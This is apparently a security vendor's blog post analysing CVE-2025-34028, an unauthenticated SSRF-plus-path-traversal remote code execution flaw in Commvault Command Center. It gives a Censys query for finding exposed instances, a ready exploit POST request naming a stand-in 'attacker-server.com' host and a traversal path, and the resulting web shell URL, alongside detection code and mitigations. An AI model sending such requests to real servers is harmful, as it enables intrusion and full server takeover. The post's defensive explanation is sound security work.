
Understanding CVE-2025-34028, Commvault’s Critical Pre-Auth RCE Vulnerability

In April 2025, a critical pre-auth Remote Code Execution vulnerability, CVE-2025-34028, was discovered in Commvault Command Center. This vulnerability allows attackers to achieve remote code execution without authentication by exploiting a Server-Side Request Forgery (SSRF) and a path traversal issue that together enable uploading and executing malicious ZIP files. With a CVSS score of 10.0, this vulnerability poses a risk to organizations using affected versions of Commvault Command Center. CISA added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog on May 2nd.

In this blog, we’ll explore the details of CVE-2025-34028, how attackers can exploit it, and the steps organizations can take to mitigate this critical issue.


What is Commvault?

Commvault is an enterprise data protection and management platform used by major organizations worldwide. It offers reliable backup and recovery for servers, databases, VMs, cloud resources, and endpoints. Built-in disaster recovery ensures business continuity with features like replication and automated failover. It also handles data archiving, retention, and compliance across the data lifecycle. With strong cloud integration and automation, Commvault simplifies complex data management tasks.

What Is CVE-2025-34028?

CVE-2025-34028 is a pre-authentication remote code execution vulnerability in Commvault Command Center, caused by improper validation of user inputs in the deployWebpackage.do endpoint. The vulnerability allows attackers to chain together server-side request forgery (SSRF) and path traversal vulnerabilities to upload and execute malicious files on the server.

Key Details:

  • Severity: Critical (CVSS 10.0)
  • Affected Systems: Commvault Command Center Innovation Release versions 11.38.0 through 11.38.19 on both Windows and Linux platforms
  • Exploitation: Attackers can craft a malicious request to exploit SSRF and path traversal vulnerabilities, uploading and executing arbitrary code with system privileges

Status: Added to CISA’s Known Exploited Vulnerabilities (KEV) catalog on May 2, 2025

Exploiting CVE-2025-34028 Step-By-Step

Step 1: Identifying Vulnerable Commvault Command Center Instances

Attackers can use Shodan or Censys to find publicly accessible Commvault Command Center instances.

Censys query to find Commvault Command Center instances:

host.services:(cert.parsed.issuer.common_name={"COMMVAULT", "cv2"} or endpoints.http.headers:(key:"Location" and value:"/commandcenter/") or endpoints.http.headers:(key:"Server" and value:"Commvault WebServer") or endpoints.http.html_title={"Command Center", "Comvault&reg"} or endpoints.http.uri:"/commandcenter/" or cert.parsed.subject.organization="CommVault Systems, Inc.")

At the time of writing this blog, we found approx. 1400+ instances on Censys.

Note: Not all exposed instances are necessarily vulnerable to CVE-2025-34028, as this affects only Innovation Release versions 11.38.0-11.38.19

Step 2: Crafting the Malicious Request

Once attackers identify vulnerable Command Center instances, they prepare a malicious ZIP file containing a web shell and host it on an attacker-controlled server. They then send a specially crafted request to the vulnerable endpoint:

```http
POST /commandcenter/deployWebpackage.do HTTP/1.1
Host: <target ip>
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 112

commcellName=attacker-server.com&servicePack=../../Reports/MetricsUpload/shell/&version=exploit
```
The exploitation of CVE-2025-34028 involves chaining multiple vulnerabilities together:

Step 3: Server-Side Request Forgery (SSRF)

The Commvault server processes the request and attempts to connect to the attacker-controlled server specified in the commcellName parameter to download what it believes is a legitimate package:

```java
// commcellName is taken directly from the unauthenticated request and used as the
// host to fetch from, so the server can be pointed at any attacker-chosen origin (SSRF)
HttpGet request = new HttpGet("https://" + commcellName + "/commandcenter/webpackage.do");
request.addHeader("Accept", "application/octet-stream");
CloseableHttpResponse response = client.execute(request);
```
Step 4: Path Traversal Exploitation

The Commvault server uses the servicePack parameter, which contains path traversal sequences (../../), to determine where to save and extract the downloaded file:

```java
// Intended base directory for downloaded packages: <BASE_PATH>/Apache/conf/ccPackages/
String confPath = BASE_PATH + File.separator + "Apache" + File.separator + "conf" + File.separator + "ccPackages" + File.separator;
// servicePack is appended unvalidated; "../" sequences walk out of ccPackages
File confDirectory = this.createDirectory(confPath + servicePack);
```
Without proper validation, the path traversal allows the attacker to escape the intended directory and place files in a web-accessible location.
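The check that is missing above, written as an added example in Python (this is not Commvault's code, and the base directory path is a constructed stand-in for BASE_PATH/Apache/conf/ccPackages). It first collapses the user-supplied value the way the filesystem would, showing exactly where the page's `../../Reports/MetricsUpload/shell/` value lands, then accepts a value only when it is a plain single path component that still resolves inside the package directory:

```python
import re
from pathlib import PurePosixPath

# Constructed stand-in for BASE_PATH/Apache/conf/ccPackages (not the product's real install path)
CC_PACKAGES = PurePosixPath("/opt/commvault/Apache/conf/ccPackages")
# A service-pack name is expected to be one plain path component: no separators, cannot start with "."
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]{0,63}$")


def lexical_resolve(base: PurePosixPath, user_segment: str) -> PurePosixPath:
    """Collapse '.' and '..' the way naive string concatenation is interpreted by the OS."""
    parts: list = []
    for seg in (base / user_segment).parts:   # an absolute user_segment replaces base entirely
        if seg == "..":
            if len(parts) > 1:                 # never pop the root marker
                parts.pop()
        elif seg not in ("", "."):
            parts.append(seg)
    return PurePosixPath(*parts)


def is_safe_service_pack(base: PurePosixPath, service_pack: str) -> bool:
    """Accept only a plain name that still resolves to a child of base (two independent checks)."""
    if not SAFE_NAME.match(service_pack):
        return False
    target = lexical_resolve(base, service_pack)
    return target != base and base in target.parents


if __name__ == "__main__":
    for value in ("SP38.20", "../../Reports/MetricsUpload/shell/", "/etc", ""):
        print(f"{value!r:40} -> {lexical_resolve(CC_PACKAGES, value)}  safe={is_safe_service_pack(CC_PACKAGES, value)}")
```

Running it shows the traversal value resolving to `/opt/commvault/Apache/Reports/MetricsUpload/shell`, two levels above the intended directory, and being rejected by both checks.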

Step 5: ZIP Extraction and Code Execution

The server downloads the malicious ZIP file from the attacker’s server and extracts it to the path specified by the attacker:

```java
// The response body fetched from the attacker-controlled host is written into the
// traversed directory as dist-cc.zip, then handed to the deployment routine
FileOutputStream fos = new FileOutputStream(new File(confDirectory, "dist-cc.zip"));
// ... code to write the ZIP file ...
this.deployCCPackage(servicePack);
```
The deployCCPackage() method extracts the ZIP file, placing the attacker’s web shell in a location accessible via the web server:

```java
// servicePack is used again, unvalidated, to locate the ZIP; its contents are unpacked
// into DIST_CC_PATH + TEMP_DIR, which the web server serves
this.fileZipUtil.unzipFileWrtAbsPath(CC_DEPLOY_PATH + servicePack + File.separator + "dist-cc.zip", DIST_CC_PATH + TEMP_DIR);
```
Step 6: Accessing the Web Shell

After successful exploitation, the attacker can access their web shell at a URL like:

https://<target>/reports/MetricsUpload/shell/.tmp/dist-cc/dist-cc/shell.jsp

The web shell executes with the permissions of the Commvault service account, typically SYSTEM on Windows or root on Linux, giving the attacker complete control over the server.

Explanation of the Request:

The following HTTP request demonstrates the exploitation of CVE-2025-34028:

```http
POST /commandcenter/deployWebpackage.do HTTP/1.1
Host: <target>
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 112

commcellName=attacker-server.com&servicePack=../../Reports/MetricsUpload/shell/&version=exploit
```
  • SSRF Vector: The commcellName parameter is used to specify an attacker-controlled server from which the vulnerable application will download a malicious ZIP file.
  • Path Traversal: The servicePack parameter contains directory traversal sequences (../../) that allow writing files outside the intended directory.
  • Code Execution: The combination allows an attacker to place a malicious JSP web shell in a web-accessible directory, achieving remote code execution.

Automating the exploitation of CVE-2025-34028:

Attackers can use tools like ProjectDiscovery’s Nuclei to automatically scan for and detect vulnerable instances of Commvault Command Center. Security researchers have already published Nuclei templates for CVE-2025-34028 detection.

How To Detect If You Are Vulnerable To CVE-2025-34028?

FireCompass has developed a multi-stage attack tree to detect vulnerable instances of CVE-2025-34028. By leveraging Continuous Automated Red Teaming (CART), FireCompass proactively scans attack surfaces, identifying weaknesses before attackers can exploit them.

FireCompass customers can execute a dedicated module to scan for Commvault Command Center Pre-Authentication RCE (CVE-2025-34028). This ensures that security teams can take swift remediation actions to secure their infrastructure.


Mitigation Strategies For CVE-2025-34028

  1. Update Commvault Command Center: Upgrade to the patched versions:
    • Version 11.38.20
  2. Restrict Access: Isolate the Command Center installation from external network access and implement IP whitelisting for management interfaces.
  3. Monitor Logs: Review logs for suspicious activity, particularly:
    • HTTP POST requests to /commandcenter/deployWebpackage.do
    • Unexpected outbound connections from Commvault servers
    • Creation of unusual files or directories in web-accessible locations
  4. Network Segmentation: Ensure that Commvault Command Center is not directly exposed to the internet and is properly segmented from untrusted networks.
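The log review in point 3 can be scripted. The following is an added example (not FireCompass's module or any Commvault tooling) that runs over constructed Apache combined-format access log lines and flags the two request patterns this write-up describes: a POST to /commandcenter/deployWebpackage.do, and a JSP request under /reports/MetricsUpload/.../.tmp/dist-cc/, rated high when it follows a deploy POST from the same client. The sample lines and RFC 5737 addresses are constructed; a deploy POST on its own may be legitimate administration, which is why it is rated medium.

```python
import re
from typing import Dict, List

# Constructed sample lines in Apache combined log format (not real traffic); RFC 5737 test addresses.
SAMPLE_LOG = """\
203.0.113.7 - - [02/May/2025:10:14:02 +0000] "POST /commandcenter/deployWebpackage.do HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.7 - - [02/May/2025:10:14:05 +0000] "GET /reports/MetricsUpload/shell/.tmp/dist-cc/dist-cc/shell.jsp HTTP/1.1" 200 88 "-" "python-requests/2.31"
198.51.100.4 - - [02/May/2025:10:20:11 +0000] "GET /commandcenter/ HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.4 - - [02/May/2025:10:21:30 +0000] "POST /commandcenter/api/Login HTTP/1.1" 200 256 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
DEPLOY_ENDPOINT = "/commandcenter/deploywebpackage.do"   # compared case-insensitively
# Extracted package contents land under Reports/MetricsUpload/<servicePack>/.tmp/dist-cc/ per the write-up above
JSP_UNDER_UPLOAD = re.compile(r"^/reports/metricsupload/.*/\.tmp/dist-cc/.*\.jsp$", re.IGNORECASE)


def detect(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per suspicious request; a JSP hit after a deploy POST from the same IP is rated high."""
    findings: List[Dict[str, str]] = []
    posted_deploy = set()                      # client IPs that have hit the deploy endpoint so far
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                           # skip lines that are not in combined format
        rec = m.groupdict()
        path = rec["path"].split("?", 1)[0]    # ignore any query string when matching
        if rec["method"] == "POST" and path.lower() == DEPLOY_ENDPOINT:
            posted_deploy.add(rec["ip"])
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "path": path,
                             "rule": "deployWebpackage_post", "severity": "medium"})
        elif JSP_UNDER_UPLOAD.match(path):
            severity = "high" if rec["ip"] in posted_deploy else "medium"
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "path": path,
                             "rule": "jsp_under_metricsupload", "severity": severity})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['ip']:15} {f['ts']}  {f['rule']}  {f['path']}")
```

Outbound connections from the Commvault host to unknown origins (the SSRF leg) are not visible in the web server's access log; correlate those from firewall or proxy logs instead.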

Conclusion

CVE-2025-34028 highlights the dangers of inadequate input validation in web applications, especially those handling sensitive operations like file downloads and extraction. By chaining together SSRF and path traversal vulnerabilities, attackers can achieve full system compromise without authentication, putting critical backup infrastructure at risk.

FireCompass continuously scans and detects such vulnerabilities, providing real-time risk assessments and attack surface visibility. Don’t wait for attackers to exploit your systems—stay ahead of attackers with FireCompass Continuous Automated Red Teaming (CART). Get started today.

Rokkam Vamshi is part of the security research team at FireCompass, specializing in CVE research, attack vectors, and cybersecurity. He is a passionate bug hunter and CTF player with expertise in web, API, and network security.
Connect with him at LinkedIn.


Priyanka Aash

Priyanka has 10+ years of experience in Strategy, Community Building & Inbound Marketing and through CISO Platform has earlier worked with marketing teams of IBM, VMware, F5 Networks, Barracuda Network, Checkpoint, and more. Priyanka is passionate about Entrepreneurship and Enterprise Marketing Strategy. Earlier she co-founded CISO Platform, the world's 1st online platform for collaboration and knowledge sharing among senior information security executives.